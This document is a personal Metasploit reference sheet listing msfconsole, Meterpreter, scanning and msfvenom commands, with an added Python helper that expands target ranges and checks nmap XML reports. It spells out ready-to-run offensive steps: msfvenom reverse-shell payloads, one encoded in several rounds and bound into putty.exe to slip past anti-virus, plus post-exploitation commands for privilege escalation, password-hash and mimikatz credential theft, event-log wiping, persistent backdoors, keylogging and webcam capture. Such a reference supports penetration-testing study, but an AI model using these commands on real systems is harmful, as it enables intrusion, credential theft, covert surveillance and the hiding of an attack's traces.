Msfconsole commands
back: leave the current module and return to the top-level prompt
banner: display an MSF banner image
check: test whether the current target is affected by the selected exploit
show options: list the options of the current exploit
connect: open a remote connection to an IP address and port
edit: open the current exploit in vim for editing
exit: leave the msfconsole environment
grep: like grep on Linux, filter the output of a command for a pattern, e.g. grep http search oracle
info: display the details of the current exploit
irb: enter an interactive Ruby shell for interacting with Metasploit and writing Metasploit scripts dynamically
jobs -h: manage the jobs currently running
kill <job id>: terminate the job with that ID
load: load a plugin from the Metasploit plugin library
loadpath: add third-party plugins to Metasploit from a path
unload: unload a plugin
resource: load a resource script and run it through msfconsole; can also be used to execute batch scripts
route: add a route (routing feature)
search: find the modules or exploits you are interested in
help search: show the help for search
search name:<keyword>: search by name
search platform:<platform>: narrow the search by platform
search type:<type>: narrow the search by type, such as auxiliary, post, exploit, etc.
search author:<author>: search by your favourite author
search name:... author:... platform:...: combine several options to narrow the search
Session management: sessions -l lists the sessions
sessions -i <id>: connect to the session with that ID and get an interactive shell
set: set the options and parameters of the current module
unset: remove a parameter you configured
setg/unsetg: set/remove global variables; a global variable saves you from setting the same option repeatedly
save: save the current configuration and settings
auxiliary: auxiliary modules (scanners, denial-of-service modules, fuzzers)
exploits: attack modules, the core of Metasploit, holding exploits for a variety of vulnerabilities
payloads: payloads
Inside an exploit module, show targets lists the targets it supports
show advanced: show the advanced options
show nops: show the NOP generators Metasploit provides
Payloads (MSF payloads)
stager: sets up a communication channel between the attacker and the victim so the staged payload can be delivered to the remote host
meterpreter: loaded through DLL injection, it resides entirely in memory and leaves no trace on disk, so traditional forensics have difficulty finding it
passivex: helps get past restrictive outbound firewalls. It creates a hidden instance of Internet Explorer through an ActiveX control and, using that control, communicates with the attacker over HTTP requests and responses
nonx: used to circumvent DEP; DEP on some CPUs prevents code from running in certain regions of memory
reflective DLL injection: injects the staged payload into a running host process in memory without touching the host's disk. Both VNC and Meterpreter use reflective DLL injection
Generating payloads
To generate shellcode with no further options, just run generate.
generate -b '\x00': exclude null bytes from the shellcode, which effectively reduces its size
Meterpreter commands (using Meterpreter)
background: switch from Meterpreter back to the msf prompt
clearev: clear the Application, System and Security event logs on a Windows system; takes no options or parameters
download: download remote files; when downloading from a Windows system, note the double backslashes in the path
edit: open a file in vi for editing
execute: run a program on the target machine, e.g. execute -f cmd.exe -i -H opens a command line
getuid: show the user the Meterpreter server is running as
hashdump: dump the contents of the SAM database
idletime: show how long the user on the remote machine has been idle
lpwd: show the local working directory of the current Meterpreter session
lcd: change the local working directory from within Meterpreter, so files at that path can be accessed directly
ps: show the processes running on the target machine
search: search the target machine for files; it can search the whole system or a given folder, and accepts wildcards
shell: get a native shell on the target machine
upload: upload files or folders to the target machine
webcam_list: run from the Meterpreter shell to list the webcams available on the target machine
webcam_snap: take a JPEG snapshot with the current target's webcam and save it
execute: execute a file on the target machine
getwd: get the current working directory on the target machine; it can also get the working directory of the current system
download: download a file from the target machine to the attacking machine
route: view routes
portfwd: Meterpreter's built-in port forwarder
ps: view processes with ps
migrate <pid>: migrate the Meterpreter session from one process into the memory space of another process, so as long as that process keeps running the Meterpreter session stays open
python_execute
The following commands are all run in the Meterpreter environment
python_execute <python statement>: run Python code through Meterpreter
python_execute "import os; cd = os.getcwd()" -r cd: use -r to print the named variable
python_import -f <path>: load a Python file into Meterpreter; -f specifies the file
Port scanning
RHOSTS accepts IP ranges, CIDR ranges, multiple ranges separated by commas, and a host list file with one host per line
THREADS: the number of concurrent threads for the scanner; defaults to 1, with rules of thumb: keep it under 16 on native Win32, under 200 under Cygwin, and on Linux-like systems THREADS can be set higher than 256
db_nmap: run an Nmap scan and save the results in the database
Running Nmap with -oA produces three output files; then populate the database with db_import
search portscan: find the port scanners available in the MSF framework
auxiliary/scanner/smb/smb_version: detect the operating system version and hostname of the target machine
auxiliary/scanner/ip/ipidseq: scan the current network for idle hosts; an idle host can be used as a zombie to scan other hosts, hiding the scanner's own address
In the ipidseq context, run nmap with the idle-scan parameter, the zombie IP and the destination IP to launch an Nmap scan through the zombie
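The two descriptions above (the forms RHOSTS accepts, and the nmap -oA files that db_import reads) are easy to get subtly wrong, so here is an added Python example, written for this page and not taken from it or from the Metasploit project. It expands an RHOSTS-style specification into individual targets and reconciles that list against the XML report nmap -oA writes, reporting which requested hosts were up, down, or never appeared in the report at all (the ones you would rescan before trusting the database). The function names and the sample report are my own constructions.

```python
"""Added example, not from the page or from Metasploit: expand an
RHOSTS-style target spec and check it against an nmap XML report.
All names (expand_rhosts, parse_nmap_xml, scan_coverage) and the
sample report below are constructed for this illustration."""
import ipaddress
import xml.etree.ElementTree as ET


def _sort_key(host):
    """Sort IP addresses numerically and hostnames after them."""
    try:
        return (0, int(ipaddress.ip_address(host)))
    except ValueError:
        return (1, host)


def expand_rhosts(spec):
    """Expand one RHOSTS value into a sorted list of target strings.

    Forms handled, matching the description above: single addresses or
    hostnames, CIDR blocks (10.0.0.0/30), dashed ranges on the last octet
    (10.0.0.1-5) or between two full addresses (10.0.0.1-10.0.0.5),
    comma-separated mixes of those, and file:<path> for a host list file
    with one entry per line (blank lines and '#' comments are skipped)."""
    hosts = set()
    for token in spec.split(","):
        token = token.strip()
        if not token:
            continue
        if token.startswith("file:"):
            with open(token[len("file:"):], encoding="utf-8") as fh:
                for line in fh:
                    line = line.strip()
                    if line and not line.startswith("#"):
                        hosts.update(expand_rhosts(line))
        elif "/" in token:
            # CIDR: every address in the block, network and broadcast
            # included, which is what a scanner target list contains.
            hosts.update(str(ip) for ip in ipaddress.ip_network(token, strict=False))
        elif "-" in token and token[0].isdigit():
            start, end = token.split("-", 1)
            if "." not in end:  # 10.0.0.1-5 shorthand for the last octet
                end = start.rsplit(".", 1)[0] + "." + end
            first, last = ipaddress.ip_address(start), ipaddress.ip_address(end)
            if last < first:
                raise ValueError(f"range end precedes start: {token}")
            hosts.update(str(type(first)(n)) for n in range(int(first), int(last) + 1))
        else:
            hosts.add(token)  # plain IP address or hostname
    return sorted(hosts, key=_sort_key)


def parse_nmap_xml(xml_text):
    """Read the <host> records of an nmap XML report (the .xml file that
    nmap -oA writes). Returns {address: {"state": ..., "ports": [...]}}
    where each port is (number, protocol, state, service name)."""
    results = {}
    for host in ET.fromstring(xml_text).iter("host"):
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            addr = host.find("address[@addrtype='ipv6']")
        if addr is None:
            continue
        status = host.find("status")
        ports = []
        for port in host.iter("port"):
            state = port.find("state")
            service = port.find("service")
            ports.append((
                int(port.get("portid")),
                port.get("protocol"),
                state.get("state") if state is not None else "unknown",
                service.get("name", "") if service is not None else "",
            ))
        results[addr.get("addr")] = {
            "state": status.get("state") if status is not None else "unknown",
            "ports": ports,
        }
    return results


def scan_coverage(spec, xml_text):
    """Compare what RHOSTS asked for with what the report actually contains."""
    wanted = expand_rhosts(spec)
    seen = parse_nmap_xml(xml_text)
    return {
        "requested": wanted,
        "up": [h for h in wanted if seen.get(h, {}).get("state") == "up"],
        "down": [h for h in wanted if seen.get(h, {}).get("state") == "down"],
        "missing": [h for h in wanted if h not in seen],  # never reported: rescan these
        "unexpected": sorted((h for h in seen if h not in wanted), key=_sort_key),
    }


# Constructed sample report in nmap's XML layout (not real scan output).
SAMPLE_NMAP_XML = """<nmaprun scanner="nmap" args="nmap -oA lab 10.0.0.1-4">
  <host><status state="up" reason="syn-ack"/>
    <address addr="10.0.0.1" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh"/></port>
      <port protocol="tcp" portid="161"><state state="closed"/></port>
    </ports>
  </host>
  <host><status state="down" reason="no-response"/>
    <address addr="10.0.0.2" addrtype="ipv4"/>
  </host>
  <host><status state="up" reason="syn-ack"/>
    <address addr="10.0.0.3" addrtype="ipv4"/>
    <ports><port protocol="udp" portid="161"><state state="open"/><service name="snmp"/></port></ports>
  </host>
</nmaprun>"""

if __name__ == "__main__":
    for key, hosts in scan_coverage("10.0.0.1-3,10.0.0.4", SAMPLE_NMAP_XML).items():
        print(f"{key:>10}: {hosts}")
```

Run it directly to see the coverage summary for the constructed report; 10.0.0.4 was requested but appears nowhere in the XML, which is exactly the gap a database populated only by db_import would silently hide.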
Using Metasploit to find vulnerable MSSQL systems (Microsoft SQL Server)
Use auxiliary/scanner/mssql/mssql_ping with the required parameters to find live MSSQL servers; auxiliary/admin/mssql/mssql_exec can then be used against them. Tools such as THC-Hydra and Medusa can also be used for brute force.
Service identification
SSH service found on port 22, FTP service on port 21
Extending psnuffle
All modules live in data/exploits/psnuffle, named after the protocol psnuffle handles; they usually work with regular expressions
SNMP sweeping
Metasploit has a built-in auxiliary module dedicated to sweeping SNMP devices. Before running it against a local snmpd, edit /etc/default/snmpd, where the line SNMPDOPTS='-Lsd -Lf /dev/null -u snmp -I -smux -p /var/run/snmpd.pid 127.0.0.1'
restricts snmpd to the loopback address, and change 127.0.0.1 to 0.0.0.0, because by default only local SNMP can be scanned. Then restart the service.
When making SNMP queries there is the MIB API; the MIB (Management Information Base) lets you query devices and extract information. Metasploit loads the MIB list from its database by default.
search snmp: list the available SNMP scan modules
Writing your own security scanner
Details to follow
msfvenom
Required options: -p and -f
-p: specify the payload; it must be followed by the payload's parameters such as lhost=... lport=... and so on, see the options
-f: specify the output format of the payload
-b: specify bytes to avoid, which automatically invokes an encoder
-e: choose the encoder module
-i: followed by the number of iterations, to encode multiple times; in some cases iterative encoding can be used to get past anti-virus software
msfvenom --help-formats: list the output formats msfvenom supports
msfvenom -l payloads: list the payloads
msfvenom -l encoders: list the encoders
msfvenom -l nops: list the NOP modules (used for padding and evasion)
Payload that calls back to a Meterpreter session:
msfvenom -p windows/meterpreter/reverse_tcp lhost=<your IP> lport=444 -f exe -o payload.exe
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.10 lport=4444 -a x86 --platform windows -e x86/shikata_ga_nai -i 3 -x /root/Download/putty.exe -k -f exe -o /root/Desktop/putty_evil.exe
Meterpreter in post-exploitation
0x01 Privilege escalation
getuid: get the current user ID
getsystem: attempt to escalate privileges
0x02 Enumerating domain admins
use post/windows/gather/enum_domain
0x03 Grabbing passwords
load mimikatz
windows/gather/hashdump
0x04 Log cleanup
clearev
0x05 Backdoor
metsvc
exploit/multi/handler
payload windows/metsvc_bind_tcp
persistence: installs a self-starting backdoor and adds a boot entry
0x06 Keylogger
keyscan_start
keyscan_dump
keyscan_stop
0x07 Process injection
0x08 Screenshot
use espia
screenshot
screengrab
These commonly used Metasploit commands come from my own understanding of the official documentation.